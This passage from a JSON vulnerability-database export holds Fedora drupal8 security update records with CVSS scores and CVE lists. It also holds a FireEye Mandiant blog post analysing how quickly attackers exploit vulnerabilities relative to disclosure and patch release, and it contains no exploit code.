"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861", "CVE-2019-6341"], "modified": "2019-04-02T01:37:00", "id": "FEDORA:2C56E6076005", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/QNTLCBAN6T7WYR5C4TNEYQD65IIR3V4P/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T14:46:50", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2019-05-08T01:19:07", "type": "fedora", "title": "[SECURITY] Fedora 28 Update: drupal8-8.6.15-1.fc28", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6930", "CVE-2017-6931", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-9861", "CVE-2019-10909", "CVE-2019-10910", "CVE-2019-10911", "CVE-2019-11358"], "modified": "2019-05-08T01:19:07", "id": "FEDORA:3F234602D69C", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/4UOAZIFCSZ3ENEFOR5IXX6NFAD3HV7FA/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-12-21T08:17:54", "description": "Drupal is an open source content management platform powering millions of websites and applications. It=EF=BF=BD=EF=BF=BD=EF=BF=BDs built, used, and supported by an active and diverse community of people around the world. ", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-04-24T03:28:25", "type": "fedora", "title": "[SECURITY] Fedora 26 Update: drupal8-8.3.9-1.fc26", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-6920", "CVE-2017-6921", "CVE-2017-6922", "CVE-2017-6923", "CVE-2017-6924", "CVE-2017-6925", "CVE-2017-6926", "CVE-2017-6927", "CVE-2017-6928", "CVE-2017-6930", "CVE-2017-6931", "CVE-2017-6932", "CVE-2018-7600"], "modified": "2018-04-24T03:28:25", "id": "FEDORA:C2CB46042D4E", "href": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/thread/S4QXGSUTNGLGN67JM5KBVWO26ICKTRXL/", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "fireeye": [{"lastseen": "2021-10-30T08:30:35", "description": "_One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization\u2019s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations. Check out our first post on zero-day vulnerabilities._\n\nAttackers are in a constant race to exploit newly discovered vulnerabilities before defenders have a chance to respond. FireEye Mandiant Threat Intelligence research into vulnerabilities exploited in 2018 and 2019 suggests that the majority of exploitation in the wild occurs before patch issuance or within a few days of a patch becoming available.\n\nFigure 1: Percentage of vulnerabilities exploited at various times in relation to patch release\n\nFireEye Mandiant Threat Intelligence analyzed 60 vulnerabilities that were either exploited or assigned a CVE number between Q1 2018 to Q3 2019. The majority of vulnerabilities were exploited as zero-days \u2013 before a patch was available. More than a quarter were exploited within one month after the patch date. Figure 2 illustrates the number of days between when a patch was made available and the first observed exploitation date for each vulnerability.\n\nWe believe these numbers to be conservative estimates, as we relied on the first reported exploitation of a vulnerability linked to a specific date. Frequently, first exploitation dates are not publicly disclosed. It is also likely that in some cases exploitation occurred without being discovered before researchers recorded exploitation attached to a certain date.\n\nFigure 2: Time between vulnerability exploitation and patch issuance\n\n\u00ad_Time Between Disclosure and Patch Release_\n\nThe average time between disclosure and patch availability was approximately 9 days. This average is slightly inflated by vulnerabilities such as CVE-2019-0863, a Microsoft Windows server vulnerability, which was disclosed in December 2018 and not patched until 5 months later in May 2019. The majority of these vulnerabilities, however, were patched quickly after disclosure. In 59% of cases, a patch was released on the same day the vulnerability was disclosed. These metrics, in combination with the observed swiftness of adversary exploitation activity, highlight the importance of responsible disclosure, as it may provide defenders with the slim window needed to successfully patch vulnerable systems.\n\n_Exploitation After Patch Release_\n\nWhile the majority of the observed vulnerabilities were zero-days, 42 percent of vulnerabilities were exploited after a patch had been released. For these non-zero-day vulnerabilities, there was a very small window (often only hours or a few days) between when the patch was released and the first observed instance of attacker exploitation. Table 1 provides some insight into the race between attackers attempting to exploit vulnerable software and organizations attempting to deploy the patch.\n\n**Time to Exploit for Vulnerabilities First Exploited after a Patch** \n \n--- \n \nHours\n\n| \n\nTwo vulnerabilities were successfully exploited within hours of a patch release, CVE-2018-2628 and CVE-2018-7602. \n \nDays\n\n| \n\n12 percent of vulnerabilities were exploited within the first week following the patch release. \n \nOne Month\n\n| \n\n15 percent of vulnerabilities were exploited after one week but within one month of patch release. \n \nYears\n\n| \n\nIn multiple cases, such as the first observed exploitation of CVE-2010-1871 and CVE-2012-0874 in 2019, attackers exploited vulnerabilities for which a patch had been made available many years prior. \n \nTable 1: Exploitation timing for patched vulnerabilities ranges from within hours of patch issuance to years after initial disclosure\n\n#### Case Studies\n\nWe continue to observe espionage and financially motivated groups quickly leveraging publicly disclosed vulnerabilities in their operations. The following examples demonstrate the speed with which sophisticated groups are able to incorporate vulnerabilities into their toolsets following public disclosure and the fact that multiple disparate groups have repeatedly leveraged the same vulnerabilities in independent campaigns. Successful operations by these types of groups are likely to have a high potential impact.\n\nFigure 3: Timeline of activity for CVE-2018-15982\n\nCVE-2018-15982: A use after free vulnerability in a file package in Adobe Flash Player 31.0.0.153 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. This vulnerability was exploited by espionage groups\u2014Russia's APT28 and North Korea's APT37\u2014as well as TEMP.MetaStrike and other financially motivated attackers.\n\nFigure 4: Timeline of activity for CVE-2018-20250\n\nCVE-2018-20250: A path traversal vulnerability exists within the ACE format in the archiver tool WinRAR versions 5.61 and earlier that, when exploited, allows an attacker to locally execute arbitrary code. This vulnerability was exploited by multiple espionage groups, including Chinese, North Korean, and Russian, groups, as well as Iranian groups APT33 and TEMP.Zagros.\n\nFigure 5: Timeline of Activity for CVE-2018-4878\n\nCVE-2018-4878: A use after free vulnerability exists within the DRMManager\u2019s \u201cinitialize\u201d call in Adobe Flash Player 28.0.0.137 and earlier that, when exploited, allows an attacker to remotely execute arbitrary code. Mandiant Intelligence confirmed that North Korea\u2019s APT37 exploited this vulnerability as a zero-day as early as September 3, 2017. Within 8 days of disclosure, we observed Russia\u2019s APT28 also leverage this vulnerability, with financially motivated attackers and North Korea\u2019s TEMP.Hermit also using within approximately a month of disclosure.\n\n#### Availability of PoC or Exploit Code\n\nThe availability of POC or exploit code on its own does not always increase the probability or speed of exploitation. However, we believe that POC code likely hastens exploitation attempts for vulnerabilities that do not require user interaction. For vulnerabilities that have already been exploited, the subsequent introduction of publicly available exploit or POC code indicates malicious actor interest and makes exploitation accessible to a wider range of attackers. There were a number of cases in which certain vulnerabilities were exploited on a large scale within 48 hours of PoC or exploit code availability (Table 2).\n\n**Time Between PoC or Exploit Code Publication and First Observed Potential Exploitation Events**\n\n| \n\n**Product**\n\n| \n\n**CVE**\n\n| \n\n**FireEye Risk Rating** \n \n---|---|---|--- \n \n1 day\n\n| \n\nWinRAR\n\n| \n\nCVE-2018-20250\n\n| \n\nMedium \n \n1 day\n\n| \n\nDrupal\n\n| \n\nCVE-2018-7600\n\n| \n\nHigh \n \n1 day\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0296\n\n| \n\nMedium \n \n2 days\n\n| \n\nApache Struts\n\n| \n\nCVE-2018-11776\n\n| \n\nHigh \n \n2 days\n\n| \n\nCisco Adaptive Security Appliance\n\n| \n\nCVE-2018-0101\n\n| \n\nHigh \n \n2 days\n\n| \n\nOracle WebLogic Server\n\n| \n\nCVE-2018-2893\n\n| \n\nHigh \n \n2 days\n\n| \n\nMicrosoft Windows Server\n\n| \n\nCVE-2018-8440\n\n| \n\nMedium \n \n2 days\n\n| \n\nDrupal\n\n| \n\nCVE-2019-6340\n\n| \n\nMedium \n \n2 days\n\n| \n\nAtlassian Confluence\n\n| \n\nCVE-2019-3396\n\n| \n\nHigh \n \nTable 2: Vulnerabilities exploited within two days of either PoC or exploit code being made publicly available, Q1 2018\u2013Q3 2019\n\n#### Trends by Targeted Products\n\nFireEye judges that malicious actors are likely to most frequently leverage vulnerabilities based on a variety of factors that influence the utility of different vulnerabilities to their specific operations. For instance, we believe that attackers are most likely to target the most widely used products (see Figure 6). Attackers almost certainly also consider the cost and availability of an exploit for a specific vulnerability, the perceived success rate based on the delivery method, security measures introduced by vendors, and user awareness around certain products.\n\nThe majority of observed vulnerabilities were for Microsoft products, likely due to the ubiquity of Microsoft offerings. In particular, vulnerabilities in software such as Microsoft Office Suite may be appealing to malicious actors based on the utility of email attached documents as initial infection vectors in phishing campaigns.\n\nFigure 6: Exploited vulnerabilities by vendor, Q1 2018\u2013Q3 2019\n\n#### Outlook and Implications\n\nThe speed with which attackers exploit patched vulnerabilities emphasizes the importance of patching as quickly as possible. With the sheer quantity of vulnerabilities disclosed each year, however, it can be difficult for organizations with limited resources and business constraints to implement an effective strategy for prioritizing the most dangerous vulnerabilities. In upcoming blog posts, FireEye Mandiant Threat Intelligence describes our approach to vulnerability risk rating as well as strategies for making informed and realistic patch management decisions in more detail.\n\nWe recommend using this exploitation trend information to better prioritize patching schedules in combination with other factors, such as known active threats to an organization's industry and geopolitical context, the availability of exploit and PoC code, commonly impacted vendors, and how widely software is deployed in an organization's environment may help to mitigate the risk of a large portion of malicious activity.\n\nRegister today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in [vulnerability threats, trends and recommendations](<https://www.brighttalk.com/webcast/7451/392772>) in our upcoming April 30 webinar.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 6.0}, "published": "2020-04-13T00:00:00", "type": "fireeye", "title": "Think Fast: Time Between Disclosure, Patch Release and Vulnerability Exploitation \u2014 Intelligence for Vulnerability Management, Part Two", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2010-1871", "CVE-2012-0874", "CVE-2018-0101", "CVE-2018-0296", "CVE-2018-11776", "CVE-2018-15982", "CVE-2018-20250", "CVE-2018-2628", "CVE-2018-2893", "CVE-2018-4878", "CVE-2018-7600", "CVE-2018-7602", "CVE-2018-8440", "CVE-2019-0863", "CVE-2019-3396", "CVE-2019-6340"], "modified": "2020-04-13T00:00:00", "id": "FIREEYE:3CF3A3DF17A5FD20D5E05C24F6DBC54B", "href": "https://www.fireeye.com/blog/threat-research/2020/04/time-between-disclosure-patch-release-and-vulnerability-exploitation.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}